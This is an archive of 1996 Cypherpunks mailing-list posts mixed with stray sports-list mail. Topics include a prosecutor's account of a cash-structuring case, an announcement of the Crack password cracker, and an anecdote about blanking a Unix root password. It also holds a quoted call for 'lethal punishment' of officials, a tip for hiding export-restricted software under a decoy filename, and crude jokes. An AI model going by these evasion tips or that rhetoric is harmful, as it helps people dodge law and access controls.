didn't consider a 5322(b) charge for various reasons.

The reason which we were unhappy with our IRS agents is that structuring 
is hard to sell to a jury in a vacuum.  If you can explain the reason for 
the structuring by, for example, adding a tax charge, the structuring 
charge is much easier to understand as something that is "wrong" within 
our system of laws.

In other words, he committed the crime but it would have been more 
difficult to prove BRD at trial than if the IRS hadn't messed up.  The 
target, who is a lawyer, wanted to resolve the matter without a trial if 
possible to avoid risking incarceration and loss of his law license.

Remember, Jim, he AGREED to the disposition.  While represented by one of 
the best criminal defense lawyers in our jurisdiction (since deceased).

Since that case, the Supreme Court has made it more difficult to succeed 
in such prosecutions by toughening the knowledge requirement.  That would 
not have help the gambling attorney, because he had previously been 
involved in transactions where CTRs were filed and knew of the regs.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 25 Dec 1996 21:26:49 -0800 (PST)
To: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <3.0.32.19961224213904.0073acc0@martigny.ai.mit.edu>
Message-ID: <Pine.BSF.3.91.961226002153.4683C-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 1996, Brian A. LaMacchia wrote:

> EBD: Please correct me if I'm wrong.  Oh, and did you go after the guy who
> wrote the three $9K checks for conspiracy or aiding-and-abetting?
> 
> 					--bal

No.  The person who wrote the checks was a secretary for the guy in 
California who ran the pool.  While we could've asserted jurisdiction and 
prosecuted her, we didn't because she had no idea why the winner wanted 
it done that way (3 $9k checks) and satisfactorily answered the question 
put to her.  The lawyer lied big time, when initially interviewed, which 
is in itself a crime.  

And most of the members of the relevant section of our office had to recuse 
themselves, because they play basketball with the guy.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 25 Dec 1996 21:31:35 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <199612250329.TAA21067@mail.pacifier.com>
Message-ID: <Pine.BSF.3.91.961226002744.4683F-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 1996, jim bell wrote:

> At 09:39 PM 12/24/96 -0500, Brian A. LaMacchia wrote:
> >At 05:54 PM 12/24/96 -0800, jim bell wrote:
> >>"Man wins $27,000.  He will eventually be required to report and pay taxes 
> >>on the amount, but not quite yet.  Stupid I/R/S people alert him BEFORE he 
> >>files his taxes.  He reports the payment, as is ostensibly legally required. 
> >> He paid the taxes owed.  Period."
> >>
> >>THEN you said, "we settled the matter."   Huh?  What, exactly, was there to 
> >>"settle"?  
> >
> >Why, of course, the fact that the guy attempted to structure the
> >transaction to evade the reporting requirements in the first place.  31
> >U.S.C. 5324(a). 
> 
> Who says?  He eventually reported it within the legally-defined time.  The 
> evidence of intent to COMPLY with the law is far stronger than the evidence 
> of the opposite.  
> 
> 
> >Structuring (or attempting to structure) a financial
> >transaction to evade the reporting requirements is a violation of this
> >subsection, and 31 U.S.C. 5322(a) says that a willful violation is a
> >five-year felony.
> 
> Again, he clearly DID NOT "evade the reporting requirement."  Brian Davis 
> admitted this. (Whether he ever intended to do this is sheer speculation on 
> the part of anyone else.  We'll never know; as Davis pointed out, the IRS 
> screwed up.)   Even if the standard of evidence was as low as "preponderance 
> of evidence" (which it, of course, is not in a criminal case) he SHOULD have 
> won.  By waiting until the return was filed and the tax was paid, the IRS 
> was allowing him to resolve whatever ambiguity remained.

You misunderstand what the statute intends.  The violation is for 
attempting to evade *the bank's* requirement to report certain 
transactions (i.e. >$10K).  He structured the transaction in an effort to 
keep the bank from complying with the law.


 
> Actually, if there were any justice, he should have been able to sue the 
> bank for reporting him and NOT INFORMING HIM of that fact.  (I presume the 
> law requires the bank to report suspicious transactions.  I also presume 
> that the law _doesn't_ prohibit the bank from telling the customer that it 
> will have to report that transaction.)  The bank, presumably being experts 
> in the matter, recognizes that lay individuals can't be expected to be experts 
> in specialized areas, and should be considered obligated to warn customers 
> away from suspicious-looking transactions.  I'm sure the REAL LAWYERS (tm) 
> on this list will be able to cite examples of where experts of all kinds 
> were sued by non-experts for failing to warn them of unexpected dangers that 
> could have been averted had the appropriate advice been given promptly.
> 
So you want the bank to be your nanny?  The guy is a lawyer and had 
previously been involved in transactions in which such reports had been 
filed.  What is your explanation for the three 3 $9k check request?  

EBD
> 
> 
> 
> Jim Bell
> jimbell@pacifier.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 25 Dec 1996 21:44:31 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <199612250547.VAA27540@mail.pacifier.com>
Message-ID: <Pine.BSF.3.91.961226003604.4683G-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 1996, jim bell wrote:

> At 12:12 AM 12/25/96 -0500, Brian A. LaMacchia wrote:
> >At 07:17 PM 12/24/96 -0800, jim bell wrote:
> >>At 09:39 PM 12/24/96 -0500, Brian A. LaMacchia wrote:
> >>>Why, of course, the fact that the guy attempted to structure the
> >>>transaction to evade the reporting requirements in the first place.  31
> >>>U.S.C. 5324(a). 
> >>
> >>Who says?  He eventually reported it within the legally-defined time.  The 
> >>evidence of intent to COMPLY with the law is far stronger than the evidence 
> >>of the opposite.  
> >
> >Bzzt, wrong answer, thanks for playing.  "Reporting" here doesn't mean
> >"report the income to the IRS on your tax return."  It refers to the report
> >the bank is required to file by law on every transaction in excess of
> >$10,000.
> 
> 
> Bzzt, wrong answer!  By definition, if the report was filed as a consequence
  of the transaction, then the transaction was reported IN FACT and the 
 
The transactions were reported as suspicious transactions. There could 
have been a reasonable explanation for them, but there wasn't.  When 
interviewed by the offending IRS agents, the target's story was 
ludicrous.  One part consisted of alleging that the first bank didn't 
have enough $100 bills to cash all three checks.  Whoooooops.  The bank 
keeps vault records, which I subpoenaed for the day in question. Guess 
what they showed. 

> person didn't evade it!   (whether he wanted to evade it is, of course, 
> pure speculation on your part.  It is, obviously, questionable whether 
> the government can make a person's mere _desires_ criminal.) > 
> Let's suppose, hypothetically, that there is a rule which states "If 
>  anybody comes in and does three separate $9,000 transactions, they get 
>  reported."  In that case, anybody who does those transactions is already 
>  aware that doing them does NOT "evade the reporting requirements." > 
> Okay, maybe no such explicit rule exists.  However, can you prove that 
> anyone really believes that he is "evading reporting requirements"?  
 
No, but he wasn't going to be charged with evading reporting 
requirements, but rather with structuring a financial transaction *in an 
attempt* to avoid reporting requirements. 

>  Having read of this incident, it is quite obvious that the government 
>  doesn't obey its own rules and doesn't limit itself to logic and 
>  reasonable positions. It is also obvious that banks can't be trusted to 
>  follow reliable rules.   Once aware of this, how can you show that a 
>  person really thought he was getting away with anything?  (which is, 
>  after all, an essential element of the crime of "structuring", I suppose.)
> 
> Gotcha!  Catch-22 situation.  
> 
Hardly.  Juries are permitted to draw reasonable inferences from the 
facts before them -- the instructions about how the checks were to be 
cut, the three bank routine (along with what he said to the tellers at 
the branch that remember the transaction), and what he told the IRS when 
they interview him.  In addition to being stupid by going to branches of 
the same bank on the same day, he was stupid (and arrogant) by not 
exercising his right to keep his mouth shut when the IRS knocked at his 
door ... and then by lying to them.

EBD

> 
> 
> 
> Jim Bell
> jimbell@pacifier.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 25 Dec 1996 21:58:35 -0800 (PST)
To: Eric Murray <ericm@lne.com>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <199612251920.LAA31394@slack.lne.com>
Message-ID: <Pine.BSF.3.91.961226005615.4683I-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Dec 1996, Eric Murray wrote:

> .... 
> 
> This is really scary to someone like me who doesn't often read
> laws.  They're required to report "suspicious" transactions
> (with the definition of "suspicious" left completely wide open)
> and they're not allowed to tell you that you have been reported.
> This sounds like police-state tactics, not something that would
> happen in a free and open society.
> 
> It's also interesting to note that section 5313(a) similarly does
> not define what is to be reported.  Is this defined elsewhere, or
> can it be changed at any time by the Secretary of the Treasury?
> 
> Reading section 5324, it sounds (to me, a layman) that there has to
> be some intent to evade the reporting requirements.  Does this mean
> that prosecutors would have to prove intent?  Does simply getting
> checks for $9000 prove intent?  I sure hope not as I have recently received
> a couple checks for consulting work that have just happened to be
> slightly under ten grand.

U.S.v. Ratzlaff, the case I whose name I was trying to remember, but 
couldn't and which Brian LaMacchia mentioned in a post, should give you 
much comfort.  I think Jim is going to report to the list on the case, so 
I won't go into any details.

EBD 



> 
> -- 
> Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
> PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 25 Dec 1996 22:07:41 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <32C0995F.6569@gte.net>
Message-ID: <Pine.BSF.3.91.961226010542.4683O-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 1996, Dale Thorn wrote:

> jim bell wrote:
> > At 03:29 PM 12/24/96 -0500, Brian Davis wrote:
> > >On Tue, 24 Dec 1996, Dale Thorn wrote:
> > >Be especially carefully of structuring a $10,000+ transaction into
> > >smaller transactions in an attempt to circumvent the reporting
> > >requirements.  Doing so ("structuring a transaction") is a felony.
> 
> > Actually, this kind of stunt fully justifies whatever level of lethal
> > punishment  that the public will one day direct at these thugs.  Look at
> > what you just said, paraphrased by me:
> 
> [snip]
> 
> I was surprised at this "settlement" thing.  I'd sure like to get more
> detail on that.  A pointer would be *most* appreciated.
> 
> 
There is no case published if that's what you are seeking.  The local 
paper ran a short article about the forfeiture.  And the Treasury 
Department issued a national press release on the first civil monetary 
penalty levied against an individual for a violation of the Bank Secrecy Act.

The decision on how to resolve it was the result of prosecutorial discretion.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "some days weren't there at all" <pandemic@hotmail.com>
Date: Thu, 26 Dec 1996 01:25:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Distributed data havens?
Message-ID: <32C1D34A.B13@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Is anything new on the distributed data haven front? Many apologies if
I'm retreading scorched earth, but I've been out of touch with the world
for the past, oh, twelve weeks. In particular, it would be interesting
to know if

* there are any lists currently extant relating to datahavens (I've
changed e-mail addresses and can't recall the subscription address for
dh-l)

* anyone has created working or in-progress code to play with. Doesn't
have to be "distributed", supported, or documented particularly well. 

* there are archives of relevant papers or talks avaliable. I've found a
few archives for cryptography and stego, but nothing specific just yet
(unless you count the discussions of anon remailers). 

Anyone still interested? 

---------------------
"Deities do not fall ten floors to the basement" - Willis/PKD
pandemic@hotmail.com   please contact for PGP public key.
http://www.skylink.net/~bigdaddy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Thu, 26 Dec 1996 03:22:36 -0800 (PST)
To: health711@cyberpromo.com
Subject: She's In The Money
In-Reply-To: <cyber3.3>
Message-ID: <32C274BE.7571@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


health711@cyberpromo.com wrote:
> I just thought I would write you a short
> note,to tell you about a free booklet I
> discovered.I ordered and I can not believe
> the fun and money I am making.All you need
> to do is send them a self addressed stamped
> envelope to homebusiness 870 market street #450
>   Ellen

  Now she gets to relax at home, on her back, wait for strangers
to ring the doorbell, and just rake in the cash.
  And the sex is great!
  My 'ex' used to have her own home business, but she got busted.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Thu, 26 Dec 1996 03:22:47 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Reflections on the Bernstein ruling
In-Reply-To: <199612260525.VAA20766@mail.pacifier.com>
Message-ID: <32C27B88.558@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> 
> However, if being "on the Internet" is automatically presumed to be an
> export, why can't we program using remote-control editors which might,
> someday, be available on the Internet? 

  If I wanted to export an unexportable program, I would put it on my
machine
as 'happyface.zip', and then make sure that god-and-everybody spread the
word
that it was available under that title.
  I don't believe there is a prosecutor alive that can convince a jury
of twelve
mostly non-technically oriented people that someone should be put in
prison for
not knowing the content of every single non-text file on their machine.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Thu, 26 Dec 1996 06:32:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <1.5.4.32.19961221065041.003d70c8@popd.ix.netcom.com>
Message-ID: <59u28s$d9m@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <1.5.4.32.19961221065041.003d70c8@popd.ix.netcom.com>,
Bill Stewart  <stewarts@ix.netcom.com> wrote:
>And that's not even counting the "You must turn on your laptop" crap.

I just took my first flight with a laptop (USair), and, having heard
stories like the above, was wondering how "on" the laptop would have to
be (past the powerup password check?  I hope they're not expecting
Windoze...).

My laptop was in my backpack, which I had oriented so that the large
face of the laptop was vertical.  It thus presented a very small cross
section to their X-ray machine, and they didn't even ask me about it.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMsKMVkZRiTErSPb1AQFukgP/R7QUsLM0SaRKdvCCm0bsjwxXUOqUPwsK
gfnEcMY+sO6crSq/vzNsK986aI7rJMjNC2rUHQqJAIAouSO7q3G/MjDSMCFjYIVs
qi2AtXBw5/KV9eV/tKcrBXRjMlDOj2pitXEVIZVqNGONIxp6Vf/EyRlKKoH7E1Yt
Wr7V2MwClSc=
=UfKP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Thu, 26 Dec 1996 05:01:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Fwd: Returned mail: User unknown]
Message-ID: <32C291D9.5998@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: message/rfc822


To: <toto@orion.sk.sympatico.ca>
Subject: Returned mail: User unknown
From: Mail Delivery Subsystem <MAILER-DAEMON@orion.sk.sympatico.ca>
Date: Thu, 26 Dec 1996 05:29:40 -0800


While connected to toad.com. [140.174.2.1] (tcp):
>>> RCPT To:<cpherpunks@toad.com>
<<< 550 <cpherpunks@toad.com>... User unknown
550 <cpherpunks@toad.com>... User unknown



To: cpherpunks@toad.com
Subject: Xmas in July
From: Carl Johnson <toto@orion.sk.sympatico.ca>
Date: Thu, 26 Dec 1996 05:29:40 -0800
Organization: TOTO Enterprises
Reply-To: toto@orion.sk.sympatico.ca

It's five in the morning, I'm almost out of Scotch, but I finally
figured out what to do with the 58 million Xmas Greetings I got from
various conferences.
  I'm going to save them, and send them, each and every one, to the
conferences they came from---in July.
  If they are spam 'then', they are spam 'now'.
  Spam-be-spam. (Bop-shoo-bop)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Thu, 26 Dec 1996 07:32:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <01BBF1A7.45E1F7D0@bcdev.com>
Message-ID: <59u5ql$dfi@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <01BBF1A7.45E1F7D0@bcdev.com>,
Blake Coverett  <blake@bcdev.com> wrote:
>I was vaguely aware of this regulation (it's been discussed here in the
>past) but actually I'm from north of the border.  Does anyone know if
>there is are similar regulations in Canada?

Well, I just came from Casino Niagara (Ontario side), and the cashiers'
windows all have a sign saying that the law requires them to check ID
for cash transactions of $1000 (not $10000) or more.  I don't know if
this is a general rule, or if it's just a rule for casinos.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMsKakUZRiTErSPb1AQGNGQP/Uax1/w3TeaJMJFUnV+3hw5HJ22Mlk+MT
H1nxewzGTUq3ryY9qiOHauPjwalRd2h7XapeyXuxb+2JSLYL5eVJ7pGCPm8F2nnZ
+E39+eC8XtY/8HnbRloRASHG0B1xQ04jE4kEHsfv1xhwFr6cikwWJUNeOH0udG/V
DtN6V9UI9dY=
=s4bM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 26 Dec 1996 07:58:11 -0800 (PST)
To: fygrave@freenet.bishkek.su (Fyodor Yarochkin)
Subject: Re: Unix Passwd
In-Reply-To: <Pine.LNX.3.91.961226155652.3979T-100000@freenet.bishkek.su>
Message-ID: <199612261556.HAA05096@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Fyodor Yarochkin writes:
> 
> 
> Anyone has any success in breaking this?
> -f

Many people have tried breaking the cipher, I have not heard
of anyone being successful.

There is however a number of programs that attempt a brute-force
of passwords, the best is called 'crack' and is written by Alec Muffet.
He's just announced a new release (see below).

Crack is commonly used by system administrators to check users passwords
for easily-cracked passwords (since it's one of the first things that a hacker
breaking into your system might try, the sysadmin can get users to change
'Crack'able passwords before they're hacked).

Crack uses a set of word dictionaries that you supply, and rules
to use to permute each word (add a '1' on the end, capitalize the first
character, etc). for more attempts.  It also included a re-written
version of the crypt algorithim that's faster than what comes in
many UNIXes.



Reply-To: Alec Muffett <alecm@crypto.dircon.co.uk>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
Subject:      ANNOUNCE: Crack v5.0a available...
X-To:         bugtraq@fc.net
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>

Eschewing the media-friendly hype which surrounded the release of
SATAN some time ago (Hi Dan!) and bemused by the fact that some of the
code he wrote years ago has since crept into the Linux-based operating
system of the machine he is composing this message on (as a standard
part of the authentication libraries, no less) - the author is pleased
to announce the release of:

                  Crack v5.0a - The Password Cracker
             Crack v6.0 - The Minimalist Password Cracker
           Crack v7.0 - The Brute-Forcing Password Cracker

                           available from:

                http://www.users.dircon.co.uk/~crypto/

(just like a London bus, you wait ages and then three turn up at once)


In the expectation that some kind soul will be good enough to retrieve
copies and place them up for FTP at various well-connected mirror
sites (the sundry CERTs, COAST, et al), the MD5 checksum for the first
distribution is:

                   6511dca525b7b921ea09eca855cc58f2

- but please be patient if you *do* suffer problems downloading; it's
not like Crack is a new piece of technology, so you shouldn't panic
about upgrading.


NOTE: Discussion of issues relating to running this version of Crack
should be directed to the newsgroup "comp.security.unix" - mention
"Crack5" in the subject line.


        - alec

------------------------------------------------------------------

New features.

   * Complete restructuring - uses less memory

   * Ships with Eric Young's "libdes" as standard

   * API for ease of integration with arbitrary crypt() functions

   * API for ease of integration with arbitrary passwd file format

   * Considerably better gecos-field checking

   * More powerful rule sets

   * Ability to read dictionaries generated by external commands

   * Better recovery mechanisms for jobs interrupted by crashes

   * Easier to control (eg: to put to sleep during working hours)

   * Bundled with Crack6 (minimalist password cracker)

   * Bundled with Crack7 (brute force password cracker)

   * Tested on Solaris, Linux, FreeBSD, NetBSD, OSF and Ultrix







-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Thu, 26 Dec 1996 06:42:04 -0800 (PST)
To: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Subject: Re: Unix Passwd
In-Reply-To: <Pine.LNX.3.91.961226155652.3979T-100000@freenet.bishkek.su>
Message-ID: <32C2AAB9.57A9@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Fyodor Yarochkin wrote:
> 
> Anyone has any success in breaking this?
> -f

   I was visiting a business running SCO Xenix, and they were all
aflutter over the fact that their 'root' password was fucked, and
they couldn't perform any System Administration tasks.
   I took their SCO installation disks, used the 'find' command to
find the 'passwd' file, and piped it to the editor.  I blanked out
the password for 'root' and rebooted the system.  When logging on 
as root, it prompted them for a new 'root' password.

   By the way, do you know why a 'Back Door' is so named?
   It's because when someone comes in through it, and wreaks havoc,
you wake up with a sore asshole.

Toto
  "The King of Country Porno"
  "The World's Foremost Computer Expert"
  "World's Greatest Fisherman"
  ...and a damn good lay.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: YukYukYo69@aol.com
Date: Thu, 26 Dec 1996 10:00:03 -0800 (PST)
To: Multiple recipients of list <oak-athletics@plaidworks.com>
Subject: Re: Remember Canseco.....
Message-ID: <961226125240_1788821896@emout16.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-12-26 02:38:52 EST, you write:

<< >Raffik:
 >
 >Obviously you don't remember the days of the immaturity of Canseco.  The
only
 >reason why they traded him was becuase he was the only cancer to a
clubhouse
 >that was overachieving and headed for the playoffs, not to mention they
could
 >get a sutible replacment for him in the field as well as a couple more arms
 >for the stretch run.  
 
 This is, of course, laughable.
 
 Canseco was dealt for 1.2 years of Witt, .2 years of Russell, and .2 years
 of Sierra.  Sierra's collapse was completely predictable, and if you
 care to call me on that, check your local news archive. >>

.2 years is called a stretch run!  That's what the whole deal was done for.
 Yeah, maybe the trade wasn't the best ever, considering only a World Series
title was going to be the mark on whether or not it was a good deal, but the
bottom line is that he made the chance on the trade.  Alderson regrets making
the deal?  Maybe so, but I was glad to see him take that chance on a team
that for sure wasn't going to beat the Jays with Canseco.

I'll admit, resigning Sierra was wrong.  The only reason it happened is
becuase it did come on the eve of the Bonds signing and Alderson felt the
heat to be competitive in the Bay Area.

And it doesn't sound like anything's gonna bring you back.  I'm not here
saying Canseco's presence is going to be an asset to the team.

And I'm still trying to figure out, are you pro or anti Canseco?

Gary
YukYukYo69@aol.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lilian Bartholo <elbee@crl.com>
Date: Thu, 26 Dec 1996 10:00:39 -0800 (PST)
To: Multiple recipients of list <oak-athletics@plaidworks.com>
Subject: Re: Remember Canseco.....
Message-ID: <Pine.SUN.3.91.961226093817.27699A-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain



I only remember the days when Jose  gave the A's 730 rbis in 7.5
years.  Excitement and charisma at the plate and a slew of good
deeds that the press never talked about.

The only "cancer" in the clubhouse that I'm glad is now gone was
TLR and his chosen few clan.

If TLR thought Jose was so bad, then why did he call him during
the offseason last year and asked him if he would play first base for him 
in St. Louis?   Maybe he just wanted to have him around so he could
use him as a distraction and as a scape-goat when things turned sour
with the team.

Lil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Simmons <tsimmons@auspex.com>
Date: Thu, 26 Dec 1996 10:07:29 -0800 (PST)
To: Multiple recipients of list <sharks-chat@plaidworks.com>
Subject: Re: RE: Scalpers (SJPD does crack down)
Message-ID: <199612261753.JAA14757@auspex.auspex.com>
MIME-Version: 1.0
Content-Type: text/plain


A
>for $60 (face = $69, and I would have taken anything over $50 without a
>haggle), about 5 minutes before game time, on the far side of Guadalupe 
>Expressway (e.g. @ Almaden Blvd.), which the Arena-patrolling uniformed 
>officers have repeatedly said is "outside the no-vending zone"...
>>>
>
>Correct me if I'm wrong.  Did the Police arrest you because you were selling
>em or because you were in a no vending zone?  If they did arrest you for
>selling them, why'd they areest you for selling them under face value?  In
>other parts of the country it's a crime to sell them above face value, but
>not below.


According to my contact in the ticket office it is NOT illegal to re-sell
tickets, even if you are selling them ABOVE face value.  San Jose Box office
makes a legal business out of this practice.

It is only illegal to sell them within a certain proximity of the venue.
You must have been within the "no vending zone"  if you were outside
of the zone, you should be able to get the charges dismissed.

Tim S.
Manufacturing Engineering
x 2162





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Thu, 26 Dec 1996 08:42:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Fuck Xmas
In-Reply-To: <32C291D9.5998@sk.sympatico.ca>
Message-ID: <32C2C013.6F8B@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


It's five in the morning, I'm almost out of Scotch, but I finally
 figured out what to do with the 58 million Xmas Greetings I got from
 various conferences.
   I'm going to save them, and send them, each and every one, to the
 conferences they came from---in July.
   If they are spam 'then', they are spam 'now'.
   Spam-be-spam. (Bop-shoo-bop)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FiFtHnAiL.c0m@strydr.com
Date: Thu, 26 Dec 1996 02:26:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: A Postcard!
Message-ID: <199612261026.KAA07009@gollum.strydr.com>
MIME-Version: 1.0
Content-Type: text/plain


========================================================
You have a postcard from FiFtHnAiL.c0m.
(fifthnail@hotmail.com
  To retrieve this postcard
point your web browser at
http://postcards.stryder.com
Your password is LIJKBCRT and must be typed in exactly 
Your postcard will be reserved for you for about two weeks 
Sincerely, the folks at Stryder Communications, Inc. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Howard Strachman <howard@ultracominc.com>
Date: Thu, 26 Dec 1996 10:34:58 -0800 (PST)
To: Subscribers to <sharks-tickets@plaidworks.com>
Subject: FS- Sharks Tkts- Front Row (2nd Deck) Jan 13
Message-ID: <1.5.4.32.19961226182040.00692258@best.com>
MIME-Version: 1.0
Content-Type: text/plain


I've got two seats in section 226, row 1 available for  sale for Jan 13.
Face value=$43 each.

Howard Strachman				Tel: 408-863-0801
Ultracom Communications, Inc.			Fax: 408-863-0363
21580 Stevens Creek Blvd			Email:howard@ultracominc.com
Cupertino, CA 95014				Web: http://www.ultracominc.com	






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Anne Greene" <anne.greene@xilinx.com>
Date: Thu, 26 Dec 1996 10:42:40 -0800 (PST)
To: Subscribers to <sharks-tickets@plaidworks.com>
Subject: FS-Jan 7 Row 1 Sec 211
Message-ID: <n1360525539.67393@mailgate>
MIME-Version: 1.0
Content-Type: text/plain


                      Subject:                              Time:  10:34 AM
  OFFICE MEMO         FS:Jan 7 Row 1 Sec 211                Date:  12/26/96

I have two seats, on the rim, end that sharks shoot on twice for the Jan. 7th
Buffalo game.
Sec 211, Row 1, seats 1 & 2
$86 for the pair (face value)
Email me at: anne.greene@xilinx.com or call 408-879-6716
Happy Boxing day,
Anne





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karmy T. Kays" <kkays@sun.iwu.edu>
Date: Thu, 26 Dec 1996 10:58:08 -0800 (PST)
To: Subscribers to <bhawks-l@plaidworks.com>
Subject: Game tonight
Message-ID: <199612261835.MAA22617@sun.iwu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Is the game against the Blues tonight going to be on tv or on real audio
tonight? I would really like to see or hear it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Reynolds, Cathy A (careyno)" <CAREYNO@msg.pacbell.com>
Date: Thu, 26 Dec 1996 10:52:18 -0800 (PST)
To: Subscribers to <sharks-tickets@plaidworks.com>
Subject: For Sale for 12/26!
Message-ID: <c=US%a=_%p=Pacific_Telesis%l=MSGSRV04-961226184617Z-6624@msgsrv99.srv.pacbell.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi All,
A friend has a change in plans and can't make the game tonight.  Sorry
for the late notice.

Section 116	
Row  18& 19  (right behind the other)

They are great seats!  

Please page Nick on 510-810-4835 if you are interested.

Cathy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listproc@plaidworks.com
Date: Thu, 26 Dec 1996 11:08:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: WHICH
Message-ID: <199612261909.LAA27991@plaidworks.com>
MIME-Version: 1.0
Content-Type: text/plain


cypherpunks@toad.com: You are subscribed to the following lists;
if none appear, you are not subscribed to any:
MINORS
MINORS-SCORES
IHL
BAY-AREA-HOCKEY
ROLLER-HOCKEY-INTL
WOMEN-IN-HOCKEY
GIANTS
GIANTS-TICKETS
BASEBALL-CHAT
SHARKS
SHARKS-TICKETS
SHARKS-CHAT
HOCKEY-CHAT
DALLAS-STARS
LA-KINGS
ONLINE-DRIVE
PIT-PENGUINS
MAPLE-LEAFS
OTT-SENATORS
PHX-COYOTES
BHAWKS-L
COL-AVALANCHE
HOCKEY-COACHES
HOCKEY-REFEREES
CAL-FLAMES
OAK-ATHLETICS
HOCKEY-PLAYERS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daemon@plaidworks.com
Date: Thu, 26 Dec 1996 11:08:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: the file you requested
Message-ID: <199612261909.LAA28001@plaidworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 
Introduction to the Oakland Athletics Mailing List

Last update December 15, 1996

This file is available at any time by e-mailing to
    <oak-athletics-request@plaidworks.com> or by FTP as
    <ftp://plaidworks.com/list-archives/oak-athletics/oak-athletics.INTRO>

+++IMPORTANT+++
